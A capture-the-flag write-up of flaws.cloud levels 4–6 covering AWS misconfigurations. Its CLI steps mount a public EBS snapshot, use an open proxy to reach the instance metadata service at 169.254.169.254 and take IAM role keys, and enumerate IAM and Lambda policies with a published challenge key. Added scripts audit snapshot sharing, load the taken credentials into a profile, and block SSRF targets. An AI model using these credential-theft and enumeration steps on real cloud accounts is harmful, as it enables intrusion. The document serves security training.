LEVEL 4:
- In this level you need to get access to the web page running on an EC2 instance at 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud, so let's try to open the URL directly.
As you can see, the page asks for a username and password, which we don't have yet.
- We need the account ID, which we get using the access key from the previous level:
aws --profile key_flaws sts get-caller-identity
The output contains the account ID (975426262029) and the ARN of the caller; the IAM user name in that ARN is "backup".
- Now let's list (describe) the EC2 snapshots owned by that account:
aws --profile key_flaws ec2 describe-snapshots --owner-id 975426262029
Snapshots are regional, so add --region us-west-2 if your profile's default region is different. (The documented spelling of the option is --owner-ids; the CLI accepts the shorter form.)
- Note that if you drop the --owner-id filter from the command, the listing includes every snapshot you can access, which means all publicly shared snapshots in the region, so it gets very long.
The output tells us everything we need: "Encrypted": false (so a volume can be created from it without any KMS key), "Progress": "100%" (the snapshot completed successfully), the ID of the source volume, and "VolumeSize": 8, i.e. 8 GiB.
Now that I have the snapshot ID, I copy it and create a volume from the snapshot. To do that I sign in to my own AWS account and launch an EC2 instance to attach the volume to; the steps are:
- I gave it a name and chose an Ubuntu image.
- Create a new key pair for SSH, give it a name and download it.
- In the security group, allow SSH only from "My IP", then launch the instance.
- Back in the terminal, change to the directory where the key was downloaded and restrict its permissions with chmod 400, otherwise ssh refuses to use the key.
- Now I create a volume from the snapshot with the command below, but first check the availability zone of the instance, because a volume can only be attached to an instance in the same zone; mine is in us-west-2b. Note that this runs under my own profile ("Nawras"), not the flaws key: the snapshot is public, so any AWS account can create a volume from it.
aws --profile Nawras ec2 create-volume --availability-zone us-west-2b --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
The output shows "State": "creating" and the new volume ID; copy the ID for the next step.
- Back in the AWS console, open Volumes, find the volume that was just created and attach it to the instance (the same can be done from the CLI with ec2 attach-volume).
- Now I need the public IP: in EC2, select the instance I created and copy its public IPv4 address.
- Then connect to the instance over SSH with the downloaded key:
ssh ubuntu@54.202.74.76 -i theflaws4.pem
- Accept the host key by typing yes, and I have a shell on the instance.
- List the block devices to find the attached volume:
lsblk
The attached volume shows up as an extra disk, here /dev/xvdf with the partition /dev/xvdf1 (on Nitro-based instance types it appears as /dev/nvme1n1 with /dev/nvme1n1p1 instead). Check what filesystem the partition holds before mounting it:
sudo file -s /dev/xvdf1
- Then mount it (adding -o ro keeps our copy of the snapshot untouched):
sudo mount /dev/xvdf1 /mnt
- Browsing the mounted filesystem, I found the username and password for the web page, and I can now dig around freely in this snapshot of the EC2 instance that hosts the web server.
- Logging in to the page with those credentials reveals the path to level 5, which finishes this challenge.
The flaws in this level:
AWS lets you take snapshots of EC2 volumes and databases (RDS). The main purpose is backups, but people sometimes use snapshots to get back into their own EC2 instances after forgetting the password. The same capability lets attackers get access to things. Snapshots are private by default and restricted to your own account, and you can share one securely with another account by specifying that account's ID in the snapshot's createVolumePermission, but a number of people just make them public and forget about them.
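Public sharing is not visible in the describe-snapshots listing itself; it lives in the snapshot's createVolumePermission attribute (aws ec2 describe-snapshot-attribute --snapshot-id ... --attribute createVolumePermission). The script below is an added example, not code from this writeup or from flaws.cloud: it takes the two JSON documents the CLI would return and flags snapshots that are public or shared with other accounts. Both JSON samples are constructed in the shape of the CLI output; only the first snapshot ID and the account ID come from the level, and the volume IDs, timestamps and the second account ID are made up.

```python
"""Audit EC2 snapshot sharing: which snapshots are public or shared with other accounts.

Added example, not the writeup's code. The JSON below is constructed to match the
shape of `aws ec2 describe-snapshots` and `aws ec2 describe-snapshot-attribute
--attribute createVolumePermission` output.
"""
import json

# Constructed sample of `describe-snapshots --owner-ids 975426262029` output.
# Only the first snapshot ID is the real one from level 4; volume IDs and times are made up.
DESCRIBE_SNAPSHOTS = json.dumps({"Snapshots": [
    {"SnapshotId": "snap-0b49342abd1bdcb89", "OwnerId": "975426262029",
     "Encrypted": False, "State": "completed", "Progress": "100%",
     "VolumeId": "vol-0aaaaaaaaaaaaaaa1", "VolumeSize": 8,
     "Description": "", "StartTime": "2017-02-28T01:35:12.000Z"},
    {"SnapshotId": "snap-0bbbbbbbbbbbbbbb2", "OwnerId": "975426262029",
     "Encrypted": False, "State": "completed", "Progress": "100%",
     "VolumeId": "vol-0aaaaaaaaaaaaaaa2", "VolumeSize": 20,
     "Description": "db backup", "StartTime": "2017-03-01T01:00:00.000Z"},
    {"SnapshotId": "snap-0ccccccccccccccc3", "OwnerId": "975426262029",
     "Encrypted": True, "State": "completed", "Progress": "100%",
     "VolumeId": "vol-0aaaaaaaaaaaaaaa3", "VolumeSize": 8,
     "Description": "", "StartTime": "2017-03-02T01:00:00.000Z"},
]})

# Constructed samples of the createVolumePermission attribute, one per snapshot.
SNAPSHOT_ATTRIBUTES = {
    "snap-0b49342abd1bdcb89": json.dumps({"SnapshotId": "snap-0b49342abd1bdcb89",
        "CreateVolumePermissions": [{"Group": "all"}]}),            # public
    "snap-0bbbbbbbbbbbbbbb2": json.dumps({"SnapshotId": "snap-0bbbbbbbbbbbbbbb2",
        "CreateVolumePermissions": [{"UserId": "111122223333"}]}),  # shared with one account
    "snap-0ccccccccccccccc3": json.dumps({"SnapshotId": "snap-0ccccccccccccccc3",
        "CreateVolumePermissions": []}),                            # private (default)
}


def list_snapshots(describe_output):
    """Reduce describe-snapshots JSON to the fields that matter for exposure."""
    return [{"id": s["SnapshotId"], "owner": s["OwnerId"], "encrypted": s["Encrypted"],
             "complete": s["State"] == "completed", "size_gib": s["VolumeSize"]}
            for s in json.loads(describe_output)["Snapshots"]]


def sharing(attribute_output):
    """Return (is_public, [account IDs]) from a createVolumePermission document."""
    perms = json.loads(attribute_output).get("CreateVolumePermissions", [])
    public = any(p.get("Group") == "all" for p in perms)
    accounts = [p["UserId"] for p in perms if "UserId" in p]
    return public, accounts


def audit(describe_output, attributes_by_id):
    """One finding per snapshot that can be used from outside the owning account."""
    findings = []
    for snap in list_snapshots(describe_output):
        attr = attributes_by_id.get(snap["id"], '{"CreateVolumePermissions": []}')
        public, accounts = sharing(attr)
        if public:
            # AWS does not allow encrypted snapshots to be made public, so a public
            # snapshot is always plaintext: anyone can create a volume and mount it.
            findings.append({"snapshot": snap["id"], "severity": "critical",
                             "reason": "public (createVolumePermission group=all), unencrypted"})
        elif accounts:
            findings.append({"snapshot": snap["id"], "severity": "review",
                             "reason": "shared with accounts " + ", ".join(accounts)})
    return findings


if __name__ == "__main__":
    for f in audit(DESCRIBE_SNAPSHOTS, SNAPSHOT_ATTRIBUTES):
        print(f"{f['severity']:8} {f['snapshot']}  {f['reason']}")
```

In a real audit you would feed the script the output of describe-snapshots for your account and, for each snapshot ID, the output of describe-snapshot-attribute; the level 4 snapshot comes out as critical, the one shared with a single account as something to review.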
LEVEL 5:
- The description for this level says that it is easy to run a simple HTTP-only proxy on EC2, and it gives some examples of its use, so we are going to abuse that proxy feature. You should know that there is something called the "magic IP", 169.254.169.254: it is the EC2 instance metadata service, which tells an instance details about itself (instance ID, networking, the IAM role credentials and more). You can read the AWS docs on it.
- The question is whether we can use this proxy to find a way to list the contents of the level 6 bucket, which means we finally need IAM credentials that are allowed to list that S3 bucket. If we just click the level 6 link, we get this message: "Level 6 is hosted in a sub-directory, but to figure out that directory, you need to play level 5 properly."
- So what do we do? The proxy takes the target host from the URL path, for example http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/flaws.cloud/. If we replace flaws.cloud with the magic IP, the proxy fetches the metadata service for us from inside the instance (see the picture below).
- From there I walk down the tree: first latest, then meta-data. There are many things of interest in there, but since the goal is IAM credentials I look only at iam, then security-credentials, and then the role name, flaws. The full path is:
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws
Now we have an access key ID, a secret access key and a session token.
- All three values are needed. I create a new AWS profile (level5) with the access key ID and secret access key, and then edit the AWS credentials file to add the token under that profile as aws_session_token; without the token the temporary keys are rejected as invalid.
- Now we can list the s3 bucket using this command
aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud --profile level5
- The listing shows a directory name; copy it and append it to the level 6 URL to reach the level properly.
- I want to draw your attention to the fact that these credentials are short-lived (the metadata document includes an Expiration time) and are rotated after a while, so if you start getting access denied or invalid token errors, go back through the proxy and fetch fresh credentials.
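The three steps above (read the security-credentials document, put all three values into a profile, watch the expiry) are easy to get wrong by hand, most often by leaving out the session token. The following is an added example, not code from this writeup or from flaws.cloud, that takes the JSON the metadata service returns, merges it into credentials-file text as a named profile with aws_session_token set, and reports how long the keys remain valid. The metadata document is constructed with placeholder key values in the shape of a real /latest/meta-data/iam/security-credentials/<role> response.

```python
"""Turn an IMDS security-credentials document into an AWS CLI profile and check its lifetime.

Added example, not the writeup's code. METADATA_DOC is constructed in the shape of a
/latest/meta-data/iam/security-credentials/<role-name> response; the keys are placeholders.
"""
import configparser
import io
import json
import os
from datetime import datetime, timezone

# Constructed sample (placeholder values, not real keys).
METADATA_DOC = json.dumps({
    "Code": "Success",
    "LastUpdated": "2024-01-01T11:00:00Z",
    "Type": "AWS-HMAC",
    "AccessKeyId": "ASIAEXAMPLEEXAMPLE00",
    "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "Token": "FwoGZXIvYXdzEXAMPLETOKEN==",
    "Expiration": "2024-01-01T17:00:00Z",
})


def parse_utc(text):
    """IMDS timestamps are UTC with a trailing Z and no fractional seconds."""
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def parse_metadata_credentials(doc):
    """Pick the three key fields and the expiry out of the metadata JSON."""
    data = json.loads(doc)
    if data.get("Code") != "Success":
        raise ValueError(f"metadata service returned Code={data.get('Code')!r}")
    return {"access_key": data["AccessKeyId"],
            "secret_key": data["SecretAccessKey"],
            "session_token": data["Token"],
            "expiration": parse_utc(data["Expiration"])}


def seconds_until_expiry(creds, now=None):
    """Negative means the keys are already dead and must be re-fetched through the proxy."""
    now = now or datetime.now(timezone.utc)
    return int((creds["expiration"] - now).total_seconds())


def merge_profile(existing_ini, profile, creds):
    """Add or replace [profile] in credentials-file text, keeping other profiles intact.

    The token must go under aws_session_token; temporary (ASIA...) keys without it
    are rejected by every AWS API call."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(existing_ini)
    cfg[profile] = {"aws_access_key_id": creds["access_key"],
                    "aws_secret_access_key": creds["secret_key"],
                    "aws_session_token": creds["session_token"]}
    out = io.StringIO()
    cfg.write(out)
    return out.getvalue()


def profile_keys(ini_text, profile):
    """Read one profile back out of credentials-file text."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(ini_text)
    return dict(cfg[profile])


def write_profile(path, profile, creds):
    """Merge the profile into a credentials file on disk (created if missing)."""
    existing = open(path).read() if os.path.exists(path) else ""
    with open(path, "w") as fh:
        fh.write(merge_profile(existing, profile, creds))


if __name__ == "__main__":
    creds = parse_metadata_credentials(METADATA_DOC)
    print(merge_profile("[default]\naws_access_key_id = AKIADEFAULT\n"
                        "aws_secret_access_key = x\n", "level5", creds))
    print("valid for", seconds_until_expiry(creds, parse_utc("2024-01-01T11:00:00Z")), "s")
```

With a real response you would call write_profile on ~/.aws/credentials and then run the s3 ls command with --profile level5; when seconds_until_expiry goes negative, fetch the document through the proxy again and rerun.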
The flaws in this level:
The IP address 169.254.169.254 is a magic IP in the cloud world. AWS and other providers use it so that cloud resources can find out metadata about themselves. If you can make any sort of HTTP request from an EC2 instance to that IP, you'll likely get back information the owner would prefer you didn't see. A similar problem to getting the IAM profile's access keys is access to the instance's user-data, which people sometimes use to pass secrets such as API keys or credentials to the instance.
Avoiding this mistake
Ensure your applications do not allow requests to 169.254.169.254 or to any other local or private IP ranges; a proxy that fetches attacker-chosen URLs is server-side request forgery. Requiring IMDSv2 on the instance also helps, because it needs a PUT request with a token header before any metadata can be read, which a simple GET-forwarding proxy cannot supply. Additionally, keep IAM roles restricted as much as possible.
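The check that the proxy in this level lacks is shown below as an added example (not code from the writeup or from flaws.cloud). It refuses any target whose host is, or resolves to, a link-local, private, loopback or otherwise non-public address, and it also catches the common bypasses: the bare-integer form of the address, an IPv4-mapped IPv6 literal, and a hostname that resolves to a mix of public and internal addresses. The resolver is injected so the example runs offline against a constructed name table; in production you would pass a lookup based on socket.getaddrinfo and then connect to the address you checked rather than re-resolving the hostname, since a DNS rebinding attacker can change the answer between the check and the request.

```python
"""Reject proxy targets that resolve to the metadata service or other non-public addresses.

Added example, not the original proxy's code. `resolve` is injected so the check runs
offline here; FAKE_DNS is a constructed name table.
"""
import ipaddress
from urllib.parse import urlsplit

DENY_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16",             # IPv4 local, private, link-local, CGNAT
    "::/128", "::1/128", "fc00::/7", "fe80::/10",   # IPv6 unspecified, loopback, ULA, link-local
)]

# Constructed resolver data (8.8.8.8 is just a known public address for the demo).
FAKE_DNS = {
    "public.example": ["8.8.8.8"],
    "intranet.internal": ["10.0.0.5"],
    "rebind.internal": ["8.8.8.8", "169.254.169.254"],   # one public, one internal answer
}


def fake_resolve(host):
    return FAKE_DNS.get(host, [])


def parse_address(text):
    """Accept dotted, IPv6 and bare-integer forms (2852039166 == 169.254.169.254)."""
    addr = ipaddress.ip_address(int(text)) if text.isdigit() else ipaddress.ip_address(text)
    mapped = getattr(addr, "ipv4_mapped", None)  # ::ffff:169.254.169.254 -> 169.254.169.254
    return addr if mapped is None else mapped


def is_denied(addr):
    """Block anything that is not a globally routable unicast address."""
    return (any(addr in net for net in DENY_NETWORKS) or addr.is_loopback
            or addr.is_link_local or addr.is_multicast or addr.is_reserved
            or addr.is_unspecified)


def host_is_blocked(host, resolve):
    """A host is blocked if *any* address it resolves to is non-public, or it fails to resolve."""
    try:
        addrs = [parse_address(host)]           # IP literal: no DNS involved
    except ValueError:
        addrs = [parse_address(a) for a in resolve(host)]
    if not addrs:
        return True                              # fail closed on unknown names
    return any(is_denied(a) for a in addrs)


def target_allowed(url, resolve=fake_resolve):
    """Decide whether the proxy may fetch `url` at all."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    return not host_is_blocked(parts.hostname, resolve)


if __name__ == "__main__":
    for u in ("http://169.254.169.254/latest/meta-data/", "http://2852039166/",
              "http://[::ffff:169.254.169.254]/", "http://rebind.internal/",
              "http://public.example/"):
        print("allow" if target_allowed(u) else "block", u)
```

Note the fail-closed choice for names that do not resolve: a proxy should never turn an unanswerable question into a permitted fetch.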
LEVEL 6:
- This level is the final challenge. You're given a user access key that has the SecurityAudit policy attached to it; see what else it can do and what else you might find in this AWS account. Access key ID: AKIAJFQ6E7BY57Q3OBGA Secret: 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 The SecurityAudit policy gives a high-level overview of the resources in an AWS account, but it's also useful for looking at IAM policies.
- First I create an AWS profile "level6" with these credentials.
- Next we look at the IAM details of this user: the user name is Level6, and we find out which policies are attached to it with this command:
aws --profile level6 iam list-attached-user-policies --user-name Level6
As we can see, there are two attached policies: SecurityAudit and a customer-managed one, "PolicyName": "list_apigateways". The second one is of interest, so let's find out what it allows.
- I copy its ARN and use this command:
aws --profile level6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
This returns the policy's metadata; the interesting parts are the policy ID and "DefaultVersionId": "v4", because the policy document itself has to be fetched by version.
- To see the actual policy document, I use this command:
aws --profile level6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
The document allows "apigateway:GET" on "arn:aws:apigateway:us-west-2::/restapis/*", i.e. read access to every REST API in API Gateway in us-west-2. API Gateway is commonly used to expose a Lambda function over HTTP, so the next step is to find out which Lambda functions exist and how their details can be combined into a URL that executes one.
aws --region us-west-2 --profile level6 lambda list-functions
There is one function visible to us, named Level6, with "Runtime": "python2.7", so the Lambda is written in Python.
- Now let's use the SecurityAudit permissions to read the function's resource policy:
aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6
The policy allows the action "lambda:InvokeFunction" on the resource "arn:aws:lambda:us-west-2:975426262029:function:Level6" for the API Gateway service, with a condition on the source ARN of the form arn:aws:execute-api:... The API ID (s33ppypa75) is embedded in that source ARN, so I copy it and use it with the apigateway permission from the other attached policy:
aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
The stage name is "Prod", which we need in order to build the URL.
- Now we need to work out the proper invoke URL for this API.
From the AWS docs the format is:
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
so the link becomes:
https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
where level6 is the API's resource path (the source ARN in the Lambda policy ends with the HTTP method and that path). Visiting this URL in the browser executes the function and returns the final page.
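The chain of get-policy, get-stages and the URL template above is mechanical enough to script, and one detail trips people up: lambda get-policy returns the policy document as a JSON string inside a JSON object, so it has to be decoded twice. The following is an added example, not code from this writeup or from flaws.cloud, that extracts the execute-api source ARNs from a function's resource policy, splits them into region, API ID, stage, method and path, and crosses them with the stages returned by get-stages to produce invoke URLs. The two JSON documents are constructed in the shape of the CLI output, using the level 6 identifiers from the writeup; the Sid, RevisionId and deployment fields are made up, and the source ARN follows the API Gateway format arn:aws:execute-api:{region}:{account}:{api-id}/{stage}/{method}/{path}.

```python
"""Recover API Gateway invoke URLs from a Lambda resource policy plus the API's stages.

Added example, not the writeup's code. Both documents below are constructed in the
shape of `aws lambda get-policy` and `aws apigateway get-stages` output.
"""
import json

# `lambda get-policy` wraps the policy document as a JSON *string*, hence the nested dumps.
LAMBDA_GET_POLICY = json.dumps({
    "Policy": json.dumps({
        "Version": "2012-10-17",
        "Id": "default",
        "Statement": [{
            "Sid": "example-sid",                       # made up
            "Effect": "Allow",
            "Principal": {"Service": "apigateway.amazonaws.com"},
            "Action": "lambda:InvokeFunction",
            "Resource": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
            "Condition": {"ArnLike": {"AWS:SourceArn":
                "arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6"}},
        }],
    }),
    "RevisionId": "00000000-0000-0000-0000-000000000000",   # made up
})

# Constructed `apigateway get-stages --rest-api-id s33ppypa75` output.
APIGW_GET_STAGES = json.dumps({"item": [
    {"deploymentId": "abcdef", "stageName": "Prod", "createdDate": 1490000000.0},
]})


def parse_lambda_policy(get_policy_output):
    """Decode the outer object, then the embedded policy string."""
    return json.loads(json.loads(get_policy_output)["Policy"])


def execute_api_source_arns(policy):
    """SourceArn values on Allow statements that let API Gateway invoke the function."""
    arns = []
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow":
            continue
        principal = st.get("Principal", {})
        if isinstance(principal, dict) and principal.get("Service") != "apigateway.amazonaws.com":
            continue
        for cond in st.get("Condition", {}).values():      # ArnLike, ArnEquals, ...
            src = cond.get("AWS:SourceArn") or cond.get("aws:SourceArn")
            for arn in ([src] if isinstance(src, str) else src or []):
                if arn.startswith("arn:aws:execute-api:"):
                    arns.append(arn)
    return arns


def parse_execute_api_arn(arn):
    """arn:aws:execute-api:{region}:{account}:{api-id}/{stage}/{method}/{path}"""
    _, _, service, region, account, resource = arn.split(":", 5)
    if service != "execute-api":
        raise ValueError(f"not an execute-api ARN: {arn}")
    api_id, stage, method, path = (resource.split("/", 3) + ["", "", ""])[:4]
    return {"region": region, "account": account, "api_id": api_id,
            "stage": stage, "method": method, "path": path}


def stage_names(get_stages_output):
    return [s["stageName"] for s in json.loads(get_stages_output)["item"]]


def invoke_urls(get_policy_output, get_stages_output):
    """The ARN's stage is usually a wildcard, which is why get-stages is needed."""
    urls = []
    for arn in execute_api_source_arns(parse_lambda_policy(get_policy_output)):
        p = parse_execute_api_arn(arn)
        stages = [p["stage"]] if p["stage"] not in ("", "*") else stage_names(get_stages_output)
        for stage in stages:
            urls.append(f"https://{p['api_id']}.execute-api.{p['region']}.amazonaws.com"
                        f"/{stage}/{p['path']}")
    return urls


if __name__ == "__main__":
    for url in invoke_urls(LAMBDA_GET_POLICY, APIGW_GET_STAGES):
        print(url)
```

Run against the real outputs of the two CLI commands, the script prints the same URL that was assembled by hand above; the method field of the parsed ARN (GET here) tells you how the endpoint expects to be called.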
The flaws in this level:
The ability to read your own and others' IAM policies helps an attacker figure out what exists in your environment and look for weaknesses and mistakes. It is common to give people and entities read-only permissions such as the SecurityAudit policy.
To avoid this mistake, don't hand out permissions liberally, even permissions that only let someone read metadata or learn what their own permissions are.